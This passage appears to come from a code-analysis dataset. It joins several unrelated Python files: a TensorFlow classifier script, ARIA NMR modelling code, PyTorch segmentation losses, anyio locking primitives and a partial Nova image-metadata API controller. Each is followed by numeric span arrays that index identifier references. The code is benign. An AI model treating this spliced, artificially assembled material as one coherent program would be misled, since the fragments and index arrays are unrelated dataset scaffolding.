],
[
19576,
19580
],
[
2847,
2851
]
]
] |
import tensorflow as tf
import numpy as np
import os,glob,cv2
import sys,argparse
# First, pass the path of the image
dir_path = os.path.dirname(os.path.realpath(__file__))
image_path=sys.argv[1]
filename = dir_path +'/' +image_path
image_size=128
num_channels=3
images = []
# Reading the image using OpenCV
image = cv2.imread(filename)
# Resizing the image to our desired size and preprocessing will be done exactly as done during training
image = cv2.resize(image, (image_size, image_size),0,0, cv2.INTER_LINEAR)
images.append(image)
images = np.array(images, dtype=np.uint8)
images = images.astype('float32')
images = np.multiply(images, 1.0/255.0)
#The input to the network is of shape [None image_size image_size num_channels]. Hence we reshape.
x_batch = images.reshape(1, image_size,image_size,num_channels)
## Let us restore the saved model
sess = tf.Session()
# Step-1: Recreate the network graph. At this step only graph is created.
saver = tf.train.import_meta_graph('ore-mine-model.meta')
# Step-2: Now let's load the weights saved using the restore method.
saver.restore(sess, tf.train.latest_checkpoint('./'))
# Accessing the default graph which we have restored
graph = tf.get_default_graph()
# Now, let's get hold of the op that we can be processed to get the output.
# In the original network y_pred is the tensor that is the prediction of the network
y_pred = graph.get_tensor_by_name("y_pred:0")
## Let's feed the images to the input placeholders
x= graph.get_tensor_by_name("x:0")
y_true = graph.get_tensor_by_name("y_true:0")
y_test_images = np.zeros((1, len(os.listdir('training_data'))))
### Creating the feed_dict that is required to be fed to calculate y_pred
feed_dict_testing = {x: x_batch, y_true: y_test_images}
result=sess.run(y_pred, feed_dict=feed_dict_testing)
# result is of this format [probabiliy_of_rose probability_of_sunflower]
print(result)
| [
[
[
7,
23
],
[
862,
864
],
[
957,
959
],
[
1096,
1098
],
[
1192,
1194
]
],
[
[
31,
42
],
[
548,
550
],
[
571,
573
],
[
624,
626
],
[
1574,
1576
]
],
[
[
50,
52
],
[
131,
133
],
[
147,
149
],
[
1591,
1593
]
],
[
[
53,
57
]
],
[
[
58,
61
],
[
319,
322
],
[
452,
455
],
[
500,
503
]
],
[
[
69,
72
],
[
186,
189
]
],
[
[
73,
81
]
],
[
[
120,
128
],
[
210,
218
]
],
[
[
175,
185
],
[
225,
235
]
],
[
[
199,
207
],
[
330,
338
]
],
[
[
236,
246
],
[
471,
481
],
[
483,
493
],
[
783,
793
],
[
794,
804
]
],
[
[
251,
263
],
[
805,
817
]
],
[
[
266,
272
],
[
518,
524
],
[
557,
563
]
],
[
[
311,
316
],
[
463,
468
]
],
[
[
444,
449
],
[
532,
537
]
],
[
[
539,
545
],
[
590,
596
]
],
[
[
581,
587
],
[
636,
642
]
],
[
[
615,
621
],
[
765,
771
]
],
[
[
755,
762
],
[
1724,
1731
]
],
[
[
855,
859
],
[
1090,
1094
],
[
1763,
1767
]
],
[
[
949,
954
],
[
1076,
1081
]
],
[
[
1184,
1189
],
[
1386,
1391
],
[
1478,
1483
],
[
1520,
1525
]
],
[
[
1377,
1383
],
[
1772,
1778
]
],
[
[
1475,
1476
],
[
1721,
1722
]
],
[
[
1511,
1517
],
[
1733,
1739
]
],
[
[
1558,
1571
],
[
1741,
1754
]
],
[
[
1700,
1717
],
[
1790,
1807
]
],
[
[
1756,
1762
],
[
1888,
1894
]
]
] |
"""
ARIA -- Ambiguous Restraints for Iterative Assignment
A software for automated NOE assignment
Version 2.3
Copyright (C) Benjamin Bardiaux, Michael Habeck, Therese Malliavin,
Wolfgang Rieping, and Michael Nilges
All rights reserved.
NO WARRANTY. This software package is provided 'as is' without warranty of
any kind, expressed or implied, including, but not limited to the implied
warranties of merchantability and fitness for a particular purpose or
a warranty of non-infringement.
Distribution of substantively modified versions of this module is
prohibited without the explicit permission of the copyright holders.
$Author: bardiaux $
$Revision: 1.1.1.1 $
$Date: 2010/03/23 15:27:24 $
"""
from aria.ariabase import *
#import numpy as N
from numpy import *
from aria.Settings import Settings
class NOEModel(AriaBaseClass):
"""
The main class for calculating NOE spectra from structures.
Update: Malliavin/Bardiaux
Becomes an abstract class to didtinct ISPA and RelaxationMatrix
to include the spin-duffusion correction of distances
"""
def __init__(self):
AriaBaseClass.__init__(self)
from aria.Contribution import ContributionEvaluator
self.__evaluator = ContributionEvaluator()
self.is_spin_diff = None
class ISPA(NOEModel):
def __init__(self):
NOEModel.__init__(self)
from aria.Contribution import ContributionEvaluator
self.__evaluator = ContributionEvaluator()
def calculatePeaksize(self, peak, ensemble):
"""
for the given peak (AriaPeak) this method computes
the intensity of a simulated NOE wrt the instance' ensemble
of structures.
n_c: number of contributions
c_i: i-th contribution, n contributions
<c_i>: ensemble-average for i-th contribution.
NOE = \sum_{i=0}^n_c <c_i>^{-6}
i.e. it is summed over ensemble-averaged contributions.
"""
check_type(peak, 'AriaPeak')
check_type(ensemble, 'StructureEnsemble')
if not peak:
self.error(ValueError, 'No contributions in xpk: %d' %
peak.getId())
from aria.mathutils import average
self.__evaluator.setStructureEnsemble(ensemble)
## for each structure: calculate effective distance
## for contribution, i.e. distances between atoms
## of every spinpair are averaged according to the
## type of the given contribution.
f = self.__evaluator.effective_distances
avg_distances = [f(c) for c in peak.getContributions()]
## for each contribution: calculate ensemble-average
## TODO: average -> _average, probably faster
avg_distances = average(avg_distances, axis = 1)
## calculate NOEs
d = power(avg_distances, -6.)
## NOE is sum over partial NOEs
return sum(d)
class SpinDiffusionCorrection(NOEModel):
def __init__(self):
NOEModel.__init__(self)
from aria.Contribution import ContributionEvaluator
self.__evaluator = ContributionEvaluator()
self.__intensity_matrix = {}
def prepare(self, molecule, ensemble):
from aria.Relaxation import Relaxation
self.relaxation = Relaxation()
self.relaxation.initialize(molecule, ensemble)
self._spin_first_atom = self.relaxation.getNonEquivalentSpinList()
self.spin_ids = self.relaxation.spin_list_id
self._spin_multiplicity = self.relaxation.getSpinMultiplicity()
def setIntensityMatrix(self, spectrum):
m = self.relaxation.calculateIntensityMatrix(spectrum)
spectrum_name = spectrum.getName()
self.__intensity_matrix[spectrum_name] = m
def getIntensityMatrix(self, name):
return self.__intensity_matrix[name]
def calculatePeaksize(self, peak, ensemble):
## Malliavin 2005/2006
"""
for the given peak (AriaPeak) this method computes
the intensity of a simulated NOE wrt the instance' ensemble
of structures.
n_c: number of contributions
c_i: i-th contribution, n contributions
<c_i>: ensemble-average for i-th contribution.
NOE = \sum_{i=0}^n_c <c_i>^{-6}
i.e. it is summed over ensemble-averaged contributions.
"""
check_type(peak, 'AriaPeak')
check_type(ensemble, 'StructureEnsemble')
if not peak:
self.error(ValueError, 'No contributions in xpk: %d' %
peak.getId())
from aria.mathutils import average
from time import clock
self.__evaluator.setStructureEnsemble(ensemble)
# Modification Therese Malliavin, December 16, 2005
spectrum = peak.getReferencePeak().getSpectrum()
spectrum_name = spectrum.getName()
intensities = self.getIntensityMatrix(spectrum_name)
atoms = [tuple(sp.getAtoms()) for c in peak.getContributions() for sp in c.getSpinPairs()]
lstintens = []
spsys = [c.getSpinSystems() for c in peak.getContributions()]
atoms = [(s[0].getAtoms()[0], s[1].getAtoms()[0]) for s in spsys]
for a1, a2 in atoms:
sp1 = self.spin_ids[a1.getId()]
sp2 = self.spin_ids[a2.getId()]
lstintens.append(intensities[sp1,sp2])
## for a1, a2 in atoms:
## #uu = [sp.count(a1) for sp in SpinFirstAtom]
## #sp1 = uu.index(1)
## #sp1 = self._get_spin_first_atom_id(a1)
## sp1 = self.spin_ids[a1.getId()]
## if self._spin_multiplicity[sp1] > 1 and a1 != self._spin_first_atom[sp1][0]:
## sp1 = 0
## #sp2 = self._get_spin_first_atom_id(a2)
## sp2 = self.spin_ids[a2.getId()]
## #uu = [sp.count(a2) for sp in SpinFirstAtom]
## #sp2 = uu.index(1)
## if self._spin_multiplicity[sp2] > 1 and a2 != self._spin_first_atom[sp2][0]:
## sp2 = 0
## if sp1 != 0 and sp2 != 0:
## lstintens.append(intensities[sp1,sp2])
## for a1, a2 in atoms:
## sp1 = self.spin_ids[a1.getId()]
## sp2 = self.spin_ids[a2.getId()]
## lstintens.append(intensities[sp1,sp2])
int_aria_pk = sum(lstintens)
peak.setTheoricVolume(int_aria_pk)
## TEST ISPA
ispa = []
for a1, a2 in atoms:
sp1 = self.spin_ids[a1.getId()]
sp2 = self.spin_ids[a2.getId()]
ispa.append(self.relaxation.distance_matrix[sp1,sp2])
peak.setIspa(sum(ispa))
return int_aria_pk
def _get_spin_first_atom_id(self, a):
for i in range(len(self._spin_first_atom)):
if a in self._spin_first_atom[i]: return i
| [
[
[
807,
808
]
],
[
[
846,
847
],
[
899,
912
],
[
1192,
1205
],
[
2057,
2067
],
[
2094,
2104
],
[
2918,
2923
],
[
4494,
4504
],
[
4531,
4541
]
],
[
[
874,
882
]
],
[
[
890,
898
],
[
1387,
1395
],
[
3040,
3048
],
[
1431,
1439
],
[
3093,
3101
]
],
[
[
1382,
1386
]
],
[
[
3016,
3039
]
]
] |
import numpy as np
import torch
import torch.nn.functional as F
import torch.nn as nn
from sklearn.utils import class_weight
from utils.lovasz_losses import lovasz_softmax
import pdb
def make_one_hot(labels, classes):
one_hot = torch.FloatTensor(labels.size()[0], classes, labels.size()[2], labels.size()[3]).zero_().to(labels.device)
target = one_hot.scatter_(1, labels.data, 1)
return target
def get_weights(target):
t_np = target.view(-1).data.cpu().numpy()
classes, counts = np.unique(t_np, return_counts=True)
cls_w = np.median(counts) / counts
#cls_w = class_weight.compute_class_weight('balanced', classes, t_np)
weights = np.ones(7)
weights[classes] = cls_w
return torch.from_numpy(weights).float().cuda()
class CrossEntropyLoss2d(nn.Module):
def __init__(self, weight=None, ignore_index=255, reduction='mean'):
super(CrossEntropyLoss2d, self).__init__()
self.CE = nn.CrossEntropyLoss(weight=weight, ignore_index=ignore_index, reduction=reduction)
def forward(self, output, target):
loss = self.CE(output, target)
return loss
class DiceLoss(nn.Module):
def __init__(self, smooth=1., ignore_index=255):
super(DiceLoss, self).__init__()
self.ignore_index = ignore_index
self.smooth = smooth
def forward(self, output, target):
if self.ignore_index not in range(target.min(), target.max()):
if (target == self.ignore_index).sum() > 0:
target[target == self.ignore_index] = target.min()
target = make_one_hot(target.unsqueeze(dim=1), classes=output.size()[1])
output = F.softmax(output, dim=1)
output_flat = output.contiguous().view(-1)
target_flat = target.contiguous().view(-1)
intersection = (output_flat * target_flat).sum()
loss = 1 - ((2. * intersection + self.smooth) /
(output_flat.sum() + target_flat.sum() + self.smooth))
return loss
class FocalLoss(nn.Module):
def __init__(self, gamma=2, alpha=None, ignore_index=255, size_average=True):
super(FocalLoss, self).__init__()
self.gamma = gamma
self.size_average = size_average
self.CE_loss = nn.CrossEntropyLoss(reduce=False, ignore_index=ignore_index, weight=alpha)
def forward(self, output, target):
logpt = self.CE_loss(output, target)
pt = torch.exp(-logpt)
loss = ((1-pt)**self.gamma) * logpt
if self.size_average:
return loss.mean()
return loss.sum()
class CE_DiceLoss(nn.Module):
def __init__(self, smooth=1, reduction='mean', ignore_index=255, weight=None):
super(CE_DiceLoss, self).__init__()
self.smooth = smooth
self.dice = DiceLoss()
self.cross_entropy = nn.CrossEntropyLoss(weight=weight, reduction=reduction, ignore_index=ignore_index)
def forward(self, output, target):
CE_loss = self.cross_entropy(output, target)
dice_loss = self.dice(output, target)
return CE_loss + dice_loss
class LovaszSoftmax(nn.Module):
def __init__(self, classes='present', per_image=False, ignore_index=255):
super(LovaszSoftmax, self).__init__()
self.smooth = classes
self.per_image = per_image
self.ignore_index = ignore_index
def forward(self, output, target):
logits = F.softmax(output, dim=1)
loss = lovasz_softmax(logits, target, ignore=self.ignore_index)
return loss
| [
[
[
7,
18
],
[
503,
505
],
[
551,
553
],
[
667,
669
]
],
[
[
26,
31
],
[
234,
239
],
[
718,
723
],
[
2398,
2403
]
],
[
[
39,
63
],
[
1646,
1647
],
[
3379,
3380
]
],
[
[
71,
85
],
[
785,
787
],
[
1138,
1140
],
[
1998,
2000
],
[
2566,
2568
],
[
3076,
3078
],
[
940,
942
],
[
2225,
2227
],
[
2794,
2796
]
],
[
[
112,
124
]
],
[
[
158,
172
],
[
3419,
3433
]
],
[
[
180,
183
]
],
[
[
189,
201
],
[
1565,
1577
]
],
[
[
413,
424
]
],
[
[
766,
784
],
[
884,
902
]
],
[
[
1129,
1137
],
[
1217,
1225
],
[
2754,
2762
]
],
[
[
1988,
1997
],
[
2106,
2115
]
],
[
[
2554,
2565
],
[
2675,
2686
]
],
[
[
3062,
3075
],
[
3180,
3193
]
]
] |
from collections import deque
from dataclasses import dataclass
from types import TracebackType
from typing import Deque, Optional, Tuple, Type
from warnings import warn
from ..lowlevel import cancel_shielded_checkpoint, checkpoint, checkpoint_if_cancelled
from ._compat import DeprecatedAwaitable
from ._eventloop import get_asynclib
from ._exceptions import BusyResourceError, WouldBlock
from ._tasks import CancelScope
from ._testing import TaskInfo, get_current_task
@dataclass(frozen=True)
class EventStatistics:
"""
:ivar int tasks_waiting: number of tasks waiting on :meth:`~.Event.wait`
"""
tasks_waiting: int
@dataclass(frozen=True)
class CapacityLimiterStatistics:
"""
:ivar int borrowed_tokens: number of tokens currently borrowed by tasks
:ivar float total_tokens: total number of available tokens
:ivar tuple borrowers: tasks or other objects currently holding tokens borrowed from this
limiter
:ivar int tasks_waiting: number of tasks waiting on :meth:`~.CapacityLimiter.acquire` or
:meth:`~.CapacityLimiter.acquire_on_behalf_of`
"""
borrowed_tokens: int
total_tokens: float
borrowers: Tuple[object, ...]
tasks_waiting: int
@dataclass(frozen=True)
class LockStatistics:
"""
:ivar bool locked: flag indicating if this lock is locked or not
:ivar ~anyio.TaskInfo owner: task currently holding the lock (or ``None`` if the lock is not
held by any task)
:ivar int tasks_waiting: number of tasks waiting on :meth:`~.Lock.acquire`
"""
locked: bool
owner: Optional[TaskInfo]
tasks_waiting: int
@dataclass(frozen=True)
class ConditionStatistics:
"""
:ivar int tasks_waiting: number of tasks blocked on :meth:`~.Condition.wait`
:ivar ~anyio.LockStatistics lock_statistics: statistics of the underlying :class:`~.Lock`
"""
tasks_waiting: int
lock_statistics: LockStatistics
@dataclass(frozen=True)
class SemaphoreStatistics:
"""
:ivar int tasks_waiting: number of tasks waiting on :meth:`~.Semaphore.acquire`
"""
tasks_waiting: int
class Event:
def __new__(cls):
return get_asynclib().Event()
def set(self) -> DeprecatedAwaitable:
"""Set the flag, notifying all listeners."""
raise NotImplementedError
def is_set(self) -> bool:
"""Return ``True`` if the flag is set, ``False`` if not."""
raise NotImplementedError
async def wait(self) -> bool:
"""
Wait until the flag has been set.
If the flag has already been set when this method is called, it returns immediately.
"""
raise NotImplementedError
def statistics(self) -> EventStatistics:
"""Return statistics about the current state of this event."""
raise NotImplementedError
class Lock:
_owner_task: Optional[TaskInfo] = None
def __init__(self):
self._waiters: Deque[Tuple[TaskInfo, Event]] = deque()
async def __aenter__(self):
await self.acquire()
async def __aexit__(self, exc_type: Optional[Type[BaseException]],
exc_val: Optional[BaseException],
exc_tb: Optional[TracebackType]) -> None:
self.release()
async def acquire(self) -> None:
"""Acquire the lock."""
await checkpoint_if_cancelled()
try:
self.acquire_nowait()
except WouldBlock:
task = get_current_task()
event = Event()
token = task, event
self._waiters.append(token)
try:
await event.wait()
except BaseException:
if not event.is_set():
self._waiters.remove(token)
raise
assert self._owner_task == task
else:
await cancel_shielded_checkpoint()
def acquire_nowait(self) -> None:
"""
Acquire the lock, without blocking.
:raises ~WouldBlock: if the operation would block
"""
task = get_current_task()
if self._owner_task == task:
raise RuntimeError('Attempted to acquire an already held Lock')
if self._owner_task is not None:
raise WouldBlock
self._owner_task = task
def release(self) -> DeprecatedAwaitable:
"""Release the lock."""
if self._owner_task != get_current_task():
raise RuntimeError('The current task is not holding this lock')
if self._waiters:
self._owner_task, event = self._waiters.popleft()
event.set()
else:
del self._owner_task
return DeprecatedAwaitable(self.release)
def locked(self) -> bool:
"""Return True if the lock is currently held."""
return self._owner_task is not None
def statistics(self) -> LockStatistics:
"""
Return statistics about the current state of this lock.
.. versionadded:: 3.0
"""
return LockStatistics(self.locked(), self._owner_task, len(self._waiters))
class Condition:
_owner_task: Optional[TaskInfo] = None
def __init__(self, lock: Optional[Lock] = None):
self._lock = lock or Lock()
self._waiters: Deque[Event] = deque()
async def __aenter__(self):
await self.acquire()
async def __aexit__(self, exc_type: Optional[Type[BaseException]],
exc_val: Optional[BaseException],
exc_tb: Optional[TracebackType]) -> None:
self.release()
def _check_acquired(self) -> None:
if self._owner_task != get_current_task():
raise RuntimeError('The current task is not holding the underlying lock')
async def acquire(self) -> None:
"""Acquire the underlying lock."""
await self._lock.acquire()
self._owner_task = get_current_task()
def acquire_nowait(self) -> None:
"""
Acquire the underlying lock, without blocking.
:raises ~WouldBlock: if the operation would block
"""
self._lock.acquire_nowait()
self._owner_task = get_current_task()
def release(self) -> DeprecatedAwaitable:
"""Release the underlying lock."""
self._lock.release()
return DeprecatedAwaitable(self.release)
def locked(self) -> bool:
"""Return True if the lock is set."""
return self._lock.locked()
def notify(self, n: int = 1) -> None:
"""Notify exactly n listeners."""
self._check_acquired()
for _ in range(n):
try:
event = self._waiters.popleft()
except IndexError:
break
event.set()
def notify_all(self) -> None:
"""Notify all the listeners."""
self._check_acquired()
for event in self._waiters:
event.set()
self._waiters.clear()
async def wait(self) -> None:
"""Wait for a notification."""
await checkpoint()
event = Event()
self._waiters.append(event)
self.release()
try:
await event.wait()
except BaseException:
if not event.is_set():
self._waiters.remove(event)
raise
finally:
with CancelScope(shield=True):
await self.acquire()
def statistics(self) -> ConditionStatistics:
"""
Return statistics about the current state of this condition.
.. versionadded:: 3.0
"""
return ConditionStatistics(len(self._waiters), self._lock.statistics())
class Semaphore:
def __init__(self, initial_value: int, *, max_value: Optional[int] = None):
if not isinstance(initial_value, int):
raise TypeError('initial_value must be an integer')
if initial_value < 0:
raise ValueError('initial_value must be >= 0')
if max_value is not None:
if not isinstance(max_value, int):
raise TypeError('max_value must be an integer or None')
if max_value < initial_value:
raise ValueError('max_value must be equal to or higher than initial_value')
self._value = initial_value
self._max_value = max_value
self._waiters: Deque[Event] = deque()
async def __aenter__(self) -> 'Semaphore':
await self.acquire()
return self
async def __aexit__(self, exc_type: Optional[Type[BaseException]],
exc_val: Optional[BaseException],
exc_tb: Optional[TracebackType]) -> None:
self.release()
async def acquire(self) -> None:
"""Decrement the semaphore value, blocking if necessary."""
await checkpoint_if_cancelled()
try:
self.acquire_nowait()
except WouldBlock:
event = Event()
self._waiters.append(event)
try:
await event.wait()
except BaseException:
if not event.is_set():
self._waiters.remove(event)
raise
else:
await cancel_shielded_checkpoint()
def acquire_nowait(self) -> None:
"""
Acquire the underlying lock, without blocking.
:raises ~WouldBlock: if the operation would block
"""
if self._value == 0:
raise WouldBlock
self._value -= 1
def release(self) -> DeprecatedAwaitable:
"""Increment the semaphore value."""
if self._max_value is not None and self._value == self._max_value:
raise ValueError('semaphore released too many times')
if self._waiters:
self._waiters.popleft().set()
else:
self._value += 1
return DeprecatedAwaitable(self.release)
@property
def value(self) -> int:
"""The current value of the semaphore."""
return self._value
@property
def max_value(self) -> Optional[int]:
"""The maximum value of the semaphore."""
return self._max_value
def statistics(self) -> SemaphoreStatistics:
"""
Return statistics about the current state of this semaphore.
.. versionadded:: 3.0
"""
return SemaphoreStatistics(len(self._waiters))
class CapacityLimiter:
def __new__(cls, total_tokens: float):
return get_asynclib().CapacityLimiter(total_tokens)
async def __aenter__(self):
raise NotImplementedError
async def __aexit__(self, exc_type: Optional[Type[BaseException]],
exc_val: Optional[BaseException],
exc_tb: Optional[TracebackType]) -> Optional[bool]:
raise NotImplementedError
@property
def total_tokens(self) -> float:
"""
The total number of tokens available for borrowing.
This is a read-write property. If the total number of tokens is increased, the
proportionate number of tasks waiting on this limiter will be granted their tokens.
.. versionchanged:: 3.0
The property is now writable.
"""
raise NotImplementedError
@total_tokens.setter
def total_tokens(self, value: float) -> None:
raise NotImplementedError
async def set_total_tokens(self, value) -> None:
warn('CapacityLimiter.set_total_tokens has been deprecated. Set the value of the'
'"total_tokens" attribute directly.', DeprecationWarning)
self.total_tokens = value
@property
def borrowed_tokens(self) -> int:
"""The number of tokens that have currently been borrowed."""
raise NotImplementedError
@property
def available_tokens(self) -> float:
"""The number of tokens currently available to be borrowed"""
raise NotImplementedError
def acquire_nowait(self) -> DeprecatedAwaitable:
"""
Acquire a token for the current task without waiting for one to become available.
:raises ~anyio.WouldBlock: if there are no tokens available for borrowing
"""
raise NotImplementedError
def acquire_on_behalf_of_nowait(self, borrower) -> DeprecatedAwaitable:
"""
Acquire a token without waiting for one to become available.
:param borrower: the entity borrowing a token
:raises ~anyio.WouldBlock: if there are no tokens available for borrowing
"""
raise NotImplementedError
async def acquire(self) -> None:
"""
Acquire a token for the current task, waiting if necessary for one to become available.
"""
raise NotImplementedError
async def acquire_on_behalf_of(self, borrower) -> None:
"""
Acquire a token, waiting if necessary for one to become available.
:param borrower: the entity borrowing a token
"""
raise NotImplementedError
def release(self) -> None:
"""
Release the token held by the current task.
:raises RuntimeError: if the current task has not borrowed a token from this limiter.
"""
raise NotImplementedError
def release_on_behalf_of(self, borrower) -> None:
"""
Release the token held by the given borrower.
:raises RuntimeError: if the borrower has not borrowed a token from this limiter.
"""
raise NotImplementedError
def statistics(self) -> CapacityLimiterStatistics:
"""
Return statistics about the current state of this limiter.
.. versionadded:: 3.0
"""
raise NotImplementedError
def create_lock() -> Lock:
"""
Create an asynchronous lock.
:return: a lock object
.. deprecated:: 3.0
Use :class:`~Lock` directly.
"""
warn('create_lock() is deprecated -- use Lock() directly', DeprecationWarning)
return Lock()
def create_condition(lock: Optional[Lock] = None) -> Condition:
"""
Create an asynchronous condition.
:param lock: the lock to base the condition object on
:return: a condition object
.. deprecated:: 3.0
Use :class:`~Condition` directly.
"""
warn('create_condition() is deprecated -- use Condition() directly', DeprecationWarning)
return Condition(lock=lock)
def create_event() -> Event:
"""
Create an asynchronous event object.
:return: an event object
.. deprecated:: 3.0
Use :class:`~Event` directly.
"""
warn('create_event() is deprecated -- use Event() directly', DeprecationWarning)
return get_asynclib().Event()
def create_semaphore(value: int, *, max_value: Optional[int] = None) -> Semaphore:
"""
Create an asynchronous semaphore.
:param value: the semaphore's initial value
:param max_value: if set, makes this a "bounded" semaphore that raises :exc:`ValueError` if the
semaphore's value would exceed this number
:return: a semaphore object
.. deprecated:: 3.0
Use :class:`~Semaphore` directly.
"""
warn('create_semaphore() is deprecated -- use Semaphore() directly', DeprecationWarning)
return Semaphore(value, max_value=max_value)
def create_capacity_limiter(total_tokens: float) -> CapacityLimiter:
"""
Create a capacity limiter.
:param total_tokens: the total number of tokens available for borrowing (can be an integer or
:data:`math.inf`)
:return: a capacity limiter object
.. deprecated:: 3.0
Use :class:`~CapacityLimiter` directly.
"""
warn('create_capacity_limiter() is deprecated -- use CapacityLimiter() directly',
DeprecationWarning)
return get_asynclib().CapacityLimiter(total_tokens)
class ResourceGuard:
__slots__ = 'action', '_guarded'
def __init__(self, action: str):
self.action = action
self._guarded = False
def __enter__(self):
if self._guarded:
raise BusyResourceError(self.action)
self._guarded = True
def __exit__(self, exc_type, exc_val, exc_tb):
self._guarded = False
| [
[
[
24,
29
],
[
2960,
2965
],
[
5276,
5281
],
[
8331,
8336
]
],
[
[
54,
63
],
[
475,
484
],
[
641,
650
],
[
1220,
1229
],
[
1626,
1635
],
[
1930,
1939
]
],
[
[
82,
95
],
[
3201,
3214
],
[
5517,
5530
],
[
8607,
8620
],
[
10710,
10723
]
],
[
[
115,
120
],
[
2928,
2933
],
[
5261,
5266
],
[
8316,
8321
]
],
[
[
122,
130
],
[
1581,
1589
],
[
2854,
2862
],
[
5122,
5130
],
[
3071,
3079
],
[
3135,
3143
],
[
3192,
3200
],
[
5178,
5186
],
[
5387,
5395
],
[
5451,
5459
],
[
5508,
5516
],
[
7710,
7718
],
[
8477,
8485
],
[
8541,
8549
],
[
8598,
8606
],
[
10019,
10027
],
[
10729,
10737
],
[
10580,
10588
],
[
10644,
10652
],
[
10701,
10709
],
[
13959,
13967
],
[
14682,
14690
]
],
[
[
132,
137
],
[
1175,
1180
],
[
2934,
2939
]
],
[
[
139,
143
],
[
3080,
3084
],
[
5396,
5400
],
[
8486,
8490
],
[
10589,
10593
]
],
[
[
165,
169
],
[
11377,
11381
],
[
13833,
13837
],
[
14212,
14216
],
[
14518,
14522
],
[
15075,
15079
],
[
15572,
15576
]
],
[
[
194,
220
],
[
3844,
3870
],
[
9171,
9197
]
],
[
[
222,
232
],
[
7015,
7025
]
],
[
[
234,
257
],
[
3333,
3356
],
[
8775,
8798
]
],
[
[
279,
298
],
[
2201,
2220
],
[
4317,
4336
],
[
4673,
4692
],
[
6190,
6209
],
[
6298,
6317
],
[
9488,
9507
],
[
9823,
9842
],
[
11914,
11933
],
[
12223,
12242
]
],
[
[
323,
335
],
[
2156,
2168
],
[
10427,
10439
],
[
14610,
14622
],
[
15694,
15706
]
],
[
[
361,
378
],
[
15966,
15983
]
],
[
[
380,
390
],
[
3421,
3431
],
[
4247,
4257
],
[
8863,
8873
],
[
9425,
9435
]
],
[
[
411,
422
],
[
7317,
7328
]
],
[
[
445,
453
],
[
1590,
1598
],
[
2863,
2871
],
[
5131,
5139
],
[
2940,
2948
]
],
[
[
455,
471
],
[
3452,
3468
],
[
4055,
4071
],
[
4401,
4417
],
[
5636,
5652
],
[
5885,
5901
],
[
6145,
6161
]
],
[
[
504,
519
],
[
2701,
2716
]
],
[
[
670,
695
],
[
13477,
13502
]
],
[
[
1249,
1263
],
[
1912,
1926
],
[
4868,
4882
],
[
5018,
5032
]
],
[
[
1655,
1674
],
[
7409,
7428
],
[
7569,
7588
]
],
[
[
1959,
1978
],
[
10144,
10163
],
[
10304,
10323
]
],
[
[
2112,
2117
],
[
2950,
2955
],
[
3491,
3496
],
[
5267,
5272
],
[
7044,
7049
],
[
8322,
8327
],
[
8895,
8900
],
[
14357,
14362
]
],
[
[
2831,
2835
],
[
5187,
5191
],
[
5231,
5235
],
[
13684,
13688
],
[
13923,
13927
],
[
13968,
13972
]
],
[
[
5094,
5103
],
[
13985,
13994
],
[
14312,
14321
]
],
[
[
7642,
7651
],
[
14707,
14716
],
[
15175,
15184
]
],
[
[
10352,
10367
],
[
15267,
15282
]
],
[
[
13667,
13678
]
],
[
[
13936,
13952
]
],
[
[
14339,
14351
]
],
[
[
14639,
14655
]
],
[
[
15219,
15242
]
],
[
[
15747,
15760
]
]
] |
# Copyright 2011 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from webob import exc
from nova.api.openstack.api_version_request import \
MAX_IMAGE_META_PROXY_API_VERSION
from nova.api.openstack import common
from nova.api.openstack.compute.schemas import image_metadata
from nova.api.openstack import wsgi
from nova.api import validation
from nova import exception
from nova.i18n import _
import nova.image
class ImageMetadataController(wsgi.Controller):
"""The image metadata API controller for the OpenStack API."""
def __init__(self):
self.image_api = nova.image.API()
def _get_image(self, context, image_id):
try:
return self.image_api.get(context, image_id)
except exception.ImageNotAuthorized as e:
raise exc.HTTPForbidden(explanation=e.format_message())
except exception.ImageNotFound:
msg = _("Image not found.")
raise exc.HTTPNotFound(explanation=msg)
@wsgi.Controller.api_version("2.1", MAX_IMAGE_META_PROXY_API_VERSION)
@wsgi.expected_errors((403, 404))
def index(self, req, image_id):
"""Returns the list of metadata for a given instance."""
context = req.environ['nova.context']
metadata = self._get_image(context, image_id)['properties']
return dict(metadata=metadata)
@wsgi.Controller.api_version("2.1", MAX_IMAGE_META_PROXY_API_VERSION)
@wsgi.expected_errors((403, 404))
def show(self, req, image_id, id):
context = req.environ['nova.context']
metadata = self._get_image(context, image_id)['properties']
if id in metadata:
return {'meta': {id: metadata[id]}}
else:
raise exc.HTTPNotFound()
@wsgi.Controller.api_version("2.1", MAX_IMAGE_META_PROXY_API_VERSION)
@wsgi.expected_errors((400, 403, 404))
@validation.schema(image_metadata.create)
def create(self, req, image_id, body):
context = req.environ['nova.context']
image = self._get_image(context, image_id)
for key, value in body['metadata'].items():
image['properties'][key] = value
common.check_img_metadata_properties_quota(context,
image['properties'])
try:
image = self.image_api.update(context, image_id, image, data=None,
purge_props=True)
except exception.ImageNotAuthorized as e:
raise exc.HTTPForbidden(explanation=e.format_message())
return dict(metadata=image['properties'])
@wsgi.Controller.api_version("2.1", MAX_IMAGE_META_PROXY_API_VERSION)
@wsgi.expected_errors((400, 403, 404))
@validation.schema(image_metadata.update)
def update(self, req, image_id, id, body):
context = req.environ['nova.context']
meta = body['meta']
if id not in meta:
expl = _('Request body and URI mismatch')
raise exc.HTTPBadRequest(explanation=expl)
image = self._get_image(context, image_id)
image['properties'][id] = meta[id]
common.check_img_metadata_properties_quota(context,
image['properties'])
try:
self.image_api.update(context, image_id, image, data=None,
purge_props=True)
except exception.ImageNotAuthorized as e:
raise exc.HTTPForbidden(explanation=e.format_message())
return dict(meta=meta)
@wsgi.Controller.api_version("2.1", MAX_IMAGE_META_PROXY_API_VERSION)
@wsgi.expected_errors((400, 403, 404))
@validation.schema(image_metadata.update_all)
def update_all(self, req, image_id, body):
context = req.environ['nova.context']
image = self._get_image(context, image_id)
metadata = body['metadata']
common.check_img_metadata_properties_quota(context, metadata)
image['properties'] = metadata
try:
self.image_api.update(context, image_id, image, data=None,
purge_props=True)
except exception.ImageNotAuthorized as e:
raise exc.HTTPForbidden(explanation=e.format_message())
return dict(metadata=metadata)
@wsgi.Controller.api_version("2.1", MAX_IMAGE_META_PROXY_API_VERSION)
